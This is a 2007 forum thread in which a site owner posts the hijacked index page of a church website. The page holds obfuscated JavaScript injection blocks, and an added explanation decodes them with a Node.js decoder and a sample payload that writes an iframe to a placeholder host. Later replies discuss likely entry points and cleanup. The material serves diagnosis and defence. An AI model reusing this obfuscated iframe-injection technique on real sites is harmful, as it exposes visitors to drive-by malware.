Website Hijacked??


hgoodson
6-22-07, 08:16 PM
I think one of my sites got hijacked.
The www.cedarcreekame.org index.htm file just has a redirection in it to another file.
I noticed a bunch of JavaScripts running when I went there on someone else's PC (and now mine). I have reloaded the original, but I wanted to know if anyone can tell me what the following code did. Did it install anything or get any info off the PCs, and if so, what do I need to do to remove any harm it did?

Here is the complete file. (I've also asked POWWEB for insight on this.)
Has anyone else noticed any changes in their files? All the JavaScript was added.
Thanks

Henry


<head>
<meta http-equiv="REFRESH" content="5;URL=http://www.cedarcreekame.org/ccquide.htm">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>index.htm - Redirecting</title>
<base target="_self">
</head>

<p>Please Wait ,&nbsp;&nbsp; REDIRECTING .......</p>
<p>&nbsp;</p>

<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='0';s+='01';s=s+'02';s=s+'101062';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='03';s+='08';s=s+'014';s=s+'09';s=s+'10106 2';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='7062';s+='8';s=s+'4';s=s+'109';s=s+'10106 2';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='02';s+=;s=s+'031;s=s+'101062';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='06004711662';s+='06048';s=s+'03214';s=s+' 109';s=s+'162';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
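
What the nbsp() routine in the post above does, shown as an added example that is not part of the original thread: each script reads `s` three decimal digits at a time, adds 848 to any value above 191, and hands the resulting character code to `document.write`. The Node.js sketch below recovers that text statically instead of running the script; the sample input and the names `extractDigits`, `decodeTriplets` and `findInjectedTags` are constructed for illustration.

```javascript
// Added example: static decoder for the nbsp() obfuscation quoted in the thread.
// Nothing here evaluates the suspect script; it is treated as text only.

// Collect the digit literals appended to `s` (s+='..' or s=s+'..').
// Spaces inside a literal are dropped (assumption: they come from forum
// line-wrapping, not from the script itself).
function extractDigits(scriptSource) {
  const re = /\bs\s*(?:\+=|=\s*s\s*\+)\s*'([\d ]*)'/g;
  let digits = "";
  for (const m of scriptSource.matchAll(re)) digits += m[1].replace(/ /g, "");
  return digits;
}

// Mirror the loop: while (i < l-1) take up to 3 digits, add 848 when the
// value exceeds 191 (192..255 become U+0410..U+044F), then fromCharCode.
function decodeTriplets(s) {
  let out = "";
  for (let i = 0; i < s.length - 1; i += 3) {
    let code = Number(s.slice(i, i + 3));
    if (code > 191) code += 848;
    out += String.fromCharCode(code);
  }
  return out;
}

// Tags worth flagging in the decoded markup.
function findInjectedTags(html) {
  const found = [];
  for (const m of html.matchAll(/<\s*(iframe|script|object|embed)\b/gi)) {
    found.push(m[1].toLowerCase());
  }
  return found;
}

// Constructed sample in the same shape as the quoted scripts; it decodes to
// an iframe pointing at the reserved, non-resolving name example.invalid.
const SAMPLE =
  "function nbsp() {var t,o,l,i,j;var s='';" +
  "s+='060105102114097109101032115114';" +
  "s+='099061034104116116112058047047';" +
  "s=s+'101120097109112108101046105110';" +
  "s=s+'118097108105100047034062';t='';l=s.length;/* loop omitted */}";

const decoded = decodeTriplets(extractDigits(SAMPLE));
console.log(JSON.stringify(decoded), findInjectedTags(decoded));
```

Because the loop stops at `l-1`, a single trailing digit is ignored and a two-digit tail is decoded as its own character, which the decoder reproduces.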

IanS
6-24-07, 05:54 AM
I've removed the actual script but left the method visible.

Keyplyr is correct, the main thing is to work out how they inserted the script into your page, or added an index page to your account.

viragotech
6-24-07, 03:15 PM
How old is your account?
Did you ever set up any other FTP accounts?

Old PowerWeb made your extra FTP account have higher level access.

Meaning the folder for the FTP would be above htdocs and not below it.

I still had an old one set up I done forgot about and got hacked like that last year.
They came in via the higher level directory and were able to install files that way.

YvetteKuhns
6-28-07, 09:44 PM
Someone hijacked a church website?! May they burn in hell! That is really sick.

entrecon
6-28-07, 11:43 PM
Looks like a hole with Invision Powerboard forum. I found this on another website:

For how to delete it (if you have your own Invision board)

Log in as an Admin, then click the Look & Feel tab.

Do the menu for the IPB Default Skin on the right side, and pick the "HTML Header & Footer Wrapper" item.

Look towards the bottom for where the trojan is added. Delete it (ours were in an IFRAME).


You'll also have to check on the Admin tab to make sure your board software is up to date...if not, you need to follow their directions to upload and run the updater.